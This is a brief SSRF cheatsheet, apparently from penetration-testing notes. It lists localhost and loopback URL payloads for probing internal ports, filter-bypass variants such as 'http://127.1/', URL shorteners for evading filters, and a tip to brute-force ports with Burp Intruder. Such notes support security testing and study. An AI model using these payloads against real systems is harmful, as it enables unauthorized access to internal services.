๐Ÿ‚SSRF

SSRF Cheatsheet

Using localhost

http://localhost:80
http://localhost:443
http://localhost:22

Using 127.0.0.1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22

Using 0.0.0.0

http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Filter Bypass

https://127.0.0.1/
https://localhost/
http://127.1/

Bypass Localhost with CIDR

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Bypass using URL Shortners

https://free-url-shortener.rb.gy/

https://shorter.me/

Brutefoce Ports

http://127.0.0.1:1337

You can brute force the port field using burp intruder or any other tool


Tools


REFERENCES

Last updated